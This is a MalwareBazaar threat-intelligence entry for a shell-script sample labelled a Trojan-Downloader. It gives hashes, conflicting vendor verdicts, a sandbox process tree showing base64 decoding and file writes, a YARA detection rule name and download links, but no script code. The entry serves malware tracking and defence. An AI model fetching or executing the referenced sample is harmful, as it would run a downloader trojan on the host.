MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 424c9a9f97515dfa3511170263ecdf4bc3cfb8e94ac491d56b4fde4e9d616676. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 7


Intelligence 7 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 424c9a9f97515dfa3511170263ecdf4bc3cfb8e94ac491d56b4fde4e9d616676
SHA3-384 hash: d13e94674a770ee861dba80efe1bf1d3de29f2b64853705cd7acbc83f82c4f0edfedad78ac7249ab3867623993eed3cd
SHA1 hash: 282dcdb2ae1ba9fa19cea0d94c5918398fe50e90
MD5 hash: fba52bc5fc0e81eae7b7e359b5e38b8a
humanhash: jig-colorado-nebraska-hamper
File name:k.php
Download: download sample
File size:19'499 bytes
First seen:2026-03-08 17:46:39 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 384:vv0M3vgRjGlsaq7DzsO9a4cbddrME8jyfzsO9a4cbddrME8jy4:vbmjfXzsP4cbddr7zsP4cbddrk
TLSH T14A925BB916496C79BBC0DE7D9F3C7F0CADE881C02118A3ACBA4F39715A2069DDA0535D
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter abuse_ch
Tags:sh

Intelligence

File Origin
# of uploads :
1
# of downloads :
54
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
evasive masquerade
Link:
https://www.filescan.io/uploads/69adb62097feb4afd6754a21/reports/914bc3e1-dd2a-4554-b6f2-148c0e87bda3/overview
Verdict:
Malicious
File Type:
unix shell
Detections:
HEUR:Trojan-Downloader.Shell.Agent.bc
Link:
https://opentip.kaspersky.com/424c9a9f97515dfa3511170263ecdf4bc3cfb8e94ac491d56b4fde4e9d616676/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/4f8ffc29-3ab1-4613-87e4-cda3091330aa
Behavior Graph:
Download SVG
%3 guuid=079644f5-1800-0000-2d27-b0d05a120000 pid=4698 /usr/bin/sudo guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707 /tmp/sample.bin guuid=079644f5-1800-0000-2d27-b0d05a120000 pid=4698->guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707 execve guuid=f10b4cf8-1800-0000-2d27-b0d065120000 pid=4709 /usr/bin/bash guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=f10b4cf8-1800-0000-2d27-b0d065120000 pid=4709 clone guuid=c7a671f8-1800-0000-2d27-b0d066120000 pid=4710 /usr/bin/bash guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=c7a671f8-1800-0000-2d27-b0d066120000 pid=4710 clone guuid=1e37a3f8-1800-0000-2d27-b0d068120000 pid=4712 /usr/bin/mkdir guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=1e37a3f8-1800-0000-2d27-b0d068120000 pid=4712 execve guuid=c5940ef9-1800-0000-2d27-b0d06a120000 pid=4714 /usr/bin/mkdir guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=c5940ef9-1800-0000-2d27-b0d06a120000 pid=4714 execve guuid=a04864f9-1800-0000-2d27-b0d06d120000 pid=4717 /usr/bin/mkdir guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=a04864f9-1800-0000-2d27-b0d06d120000 pid=4717 execve guuid=7d44baf9-1800-0000-2d27-b0d06f120000 pid=4719 /usr/bin/mkdir guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=7d44baf9-1800-0000-2d27-b0d06f120000 pid=4719 execve guuid=79c119fa-1800-0000-2d27-b0d072120000 pid=4722 /usr/bin/mkdir guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=79c119fa-1800-0000-2d27-b0d072120000 pid=4722 execve guuid=99069efa-1800-0000-2d27-b0d075120000 pid=4725 /usr/bin/mkdir guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=99069efa-1800-0000-2d27-b0d075120000 pid=4725 execve guuid=d039f1fa-1800-0000-2d27-b0d077120000 pid=4727 /usr/bin/mkdir guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=d039f1fa-1800-0000-2d27-b0d077120000 pid=4727 execve guuid=1c7249fb-1800-0000-2d27-b0d07a120000 pid=4730 /usr/bin/cp guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=1c7249fb-1800-0000-2d27-b0d07a120000 pid=4730 execve guuid=fe6c9bfb-1800-0000-2d27-b0d07c120000 pid=4732 /usr/bin/cp guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=fe6c9bfb-1800-0000-2d27-b0d07c120000 pid=4732 execve guuid=62b13efc-1800-0000-2d27-b0d07f120000 pid=4735 /usr/bin/cp guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=62b13efc-1800-0000-2d27-b0d07f120000 pid=4735 execve guuid=e0b2a2fc-1800-0000-2d27-b0d082120000 pid=4738 /usr/bin/cp guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=e0b2a2fc-1800-0000-2d27-b0d082120000 pid=4738 execve guuid=6522fcfc-1800-0000-2d27-b0d084120000 pid=4740 /usr/bin/cp guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=6522fcfc-1800-0000-2d27-b0d084120000 pid=4740 execve guuid=911050fd-1800-0000-2d27-b0d087120000 pid=4743 /usr/bin/cp guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=911050fd-1800-0000-2d27-b0d087120000 pid=4743 execve guuid=cd9daafd-1800-0000-2d27-b0d08a120000 pid=4746 /usr/bin/cp guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=cd9daafd-1800-0000-2d27-b0d08a120000 pid=4746 execve guuid=41f508fe-1800-0000-2d27-b0d08c120000 pid=4748 /usr/bin/cp guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=41f508fe-1800-0000-2d27-b0d08c120000 pid=4748 execve guuid=782066fe-1800-0000-2d27-b0d08f120000 pid=4751 /usr/bin/cp guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=782066fe-1800-0000-2d27-b0d08f120000 pid=4751 execve guuid=0313c1fe-1800-0000-2d27-b0d092120000 pid=4754 /usr/bin/cp guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=0313c1fe-1800-0000-2d27-b0d092120000 pid=4754 execve guuid=252c1aff-1800-0000-2d27-b0d094120000 pid=4756 /usr/bin/cp guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=252c1aff-1800-0000-2d27-b0d094120000 pid=4756 execve guuid=63a07aff-1800-0000-2d27-b0d096120000 pid=4758 /usr/bin/cp guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=63a07aff-1800-0000-2d27-b0d096120000 pid=4758 execve guuid=33f4cbff-1800-0000-2d27-b0d099120000 pid=4761 /usr/bin/cp guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=33f4cbff-1800-0000-2d27-b0d099120000 pid=4761 execve guuid=db213e00-1900-0000-2d27-b0d09c120000 pid=4764 /usr/bin/cp guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=db213e00-1900-0000-2d27-b0d09c120000 pid=4764 execve guuid=8ba99900-1900-0000-2d27-b0d09e120000 pid=4766 /usr/bin/cp guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=8ba99900-1900-0000-2d27-b0d09e120000 pid=4766 execve guuid=9a31fe00-1900-0000-2d27-b0d0a1120000 pid=4769 /usr/bin/touch guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=9a31fe00-1900-0000-2d27-b0d0a1120000 pid=4769 execve guuid=95745101-1900-0000-2d27-b0d0a3120000 pid=4771 /usr/bin/bash guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=95745101-1900-0000-2d27-b0d0a3120000 pid=4771 clone guuid=feb35701-1900-0000-2d27-b0d0a4120000 pid=4772 /usr/bin/bash guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=feb35701-1900-0000-2d27-b0d0a4120000 pid=4772 clone guuid=b81e8f01-1900-0000-2d27-b0d0a6120000 pid=4774 /usr/bin/bash guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=b81e8f01-1900-0000-2d27-b0d0a6120000 pid=4774 clone guuid=4a279601-1900-0000-2d27-b0d0a7120000 pid=4775 /usr/bin/base64 write-file guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=4a279601-1900-0000-2d27-b0d0a7120000 pid=4775 execve guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778 /usr/bin/bash guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778 execve guuid=576f2507-1900-0000-2d27-b0d0d0120000 pid=4816 /usr/bin/rm delete-file guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=576f2507-1900-0000-2d27-b0d0d0120000 pid=4816 execve guuid=c6c96c07-1900-0000-2d27-b0d0d2120000 pid=4818 /usr/bin/bash guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=c6c96c07-1900-0000-2d27-b0d0d2120000 pid=4818 clone guuid=bad07307-1900-0000-2d27-b0d0d3120000 pid=4819 /usr/bin/bash guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=bad07307-1900-0000-2d27-b0d0d3120000 pid=4819 clone guuid=dcf5b007-1900-0000-2d27-b0d0d5120000 pid=4821 /usr/bin/bash guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=dcf5b007-1900-0000-2d27-b0d0d5120000 pid=4821 execve guuid=6e570508-1900-0000-2d27-b0d0d7120000 pid=4823 /usr/bin/rm guuid=2ddb89f7-1800-0000-2d27-b0d063120000 pid=4707->guuid=6e570508-1900-0000-2d27-b0d0d7120000 pid=4823 execve guuid=2c616202-1900-0000-2d27-b0d0ad120000 pid=4781 /usr/bin/bash guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778->guuid=2c616202-1900-0000-2d27-b0d0ad120000 pid=4781 clone guuid=e5146f02-1900-0000-2d27-b0d0ae120000 pid=4782 /usr/bin/bash guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778->guuid=e5146f02-1900-0000-2d27-b0d0ae120000 pid=4782 clone guuid=dd6cb802-1900-0000-2d27-b0d0b0120000 pid=4784 /usr/bin/ls guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778->guuid=dd6cb802-1900-0000-2d27-b0d0b0120000 pid=4784 execve guuid=54223903-1900-0000-2d27-b0d0b3120000 pid=4787 /usr/bin/cat guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778->guuid=54223903-1900-0000-2d27-b0d0b3120000 pid=4787 execve guuid=66398603-1900-0000-2d27-b0d0b5120000 pid=4789 /usr/bin/ls guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778->guuid=66398603-1900-0000-2d27-b0d0b5120000 pid=4789 execve guuid=9677ef03-1900-0000-2d27-b0d0b8120000 pid=4792 /usr/bin/mkdir guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778->guuid=9677ef03-1900-0000-2d27-b0d0b8120000 pid=4792 execve guuid=b7865404-1900-0000-2d27-b0d0ba120000 pid=4794 /usr/bin/mv guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778->guuid=b7865404-1900-0000-2d27-b0d0ba120000 pid=4794 execve guuid=5bf9b804-1900-0000-2d27-b0d0bc120000 pid=4796 /usr/bin/bash guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778->guuid=5bf9b804-1900-0000-2d27-b0d0bc120000 pid=4796 clone guuid=7bbec004-1900-0000-2d27-b0d0bd120000 pid=4797 /usr/bin/base64 write-file guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778->guuid=7bbec004-1900-0000-2d27-b0d0bd120000 pid=4797 execve guuid=6bcf1105-1900-0000-2d27-b0d0bf120000 pid=4799 /usr/bin/rm delete-file guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778->guuid=6bcf1105-1900-0000-2d27-b0d0bf120000 pid=4799 execve guuid=04375405-1900-0000-2d27-b0d0c2120000 pid=4802 /usr/bin/ls guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778->guuid=04375405-1900-0000-2d27-b0d0c2120000 pid=4802 execve guuid=6bbeb105-1900-0000-2d27-b0d0c4120000 pid=4804 /usr/bin/bash guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778->guuid=6bbeb105-1900-0000-2d27-b0d0c4120000 pid=4804 clone guuid=606fb905-1900-0000-2d27-b0d0c5120000 pid=4805 /usr/bin/base64 write-file guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778->guuid=606fb905-1900-0000-2d27-b0d0c5120000 pid=4805 execve guuid=159e0006-1900-0000-2d27-b0d0c8120000 pid=4808 /usr/bin/ls guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778->guuid=159e0006-1900-0000-2d27-b0d0c8120000 pid=4808 execve guuid=6bce6506-1900-0000-2d27-b0d0ca120000 pid=4810 /usr/bin/cat guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778->guuid=6bce6506-1900-0000-2d27-b0d0ca120000 pid=4810 execve guuid=ea4da506-1900-0000-2d27-b0d0cc120000 pid=4812 /usr/bin/ls guuid=f6820f02-1900-0000-2d27-b0d0aa120000 pid=4778->guuid=ea4da506-1900-0000-2d27-b0d0cc120000 pid=4812 execve
Score:
81%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/424c9a9f97515dfa3511170263ecdf4bc3cfb8e94ac491d56b4fde4e9d616676
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/424c9a9f97515dfa3511170263ecdf4bc3cfb8e94ac491d56b4fde4e9d616676/
Verdict:
Malicious
Threat:
Trojan-Downloader.Shell.Agent
Link:
https://tip.neiki.dev/file/424c9a9f97515dfa3511170263ecdf4bc3cfb8e94ac491d56b4fde4e9d616676
Threat name:
Script-Shell.Trojan.Vigorf
Create hunting rule
Status:
Malicious
First seen:
2026-03-08 17:47:24 UTC
File Type:
Text (Shell)
AV detection:
13 of 24 (54.17%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=ijgjvh4xkfo7unirc4bgh3g7jpb47ohjjlcjdvllj7pe5hlbmz3a._file
Result
Malware family:
n/a
Score:
  4/10
Tags:
defense_evasion discovery linux
Link:
https://tria.ge/reports/260308-wcxz1sez4j/
Behaviour
Reads runtime system information
Writes file to tmp directory
Deobfuscate/Decode Files or Information
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/424c9a9f97515dfa3511170263ecdf4bc3cfb8e94ac491d56b4fde4e9d616676

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:SUSP_LNX_Base64_Exec_Apr24
Create hunting rule
Author:Christian Burkard
Description:Detects suspicious base64 encoded shell commands (as seen in Palo Alto CVE-2024-3400 exploitation)
Reference:Internal Research

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

sh 424c9a9f97515dfa3511170263ecdf4bc3cfb8e94ac491d56b4fde4e9d616676

(this sample)

  
URLhaus
https://urlhaus.abuse.ch/url/3784565/
  
Delivery method
Distributed via web download

Comments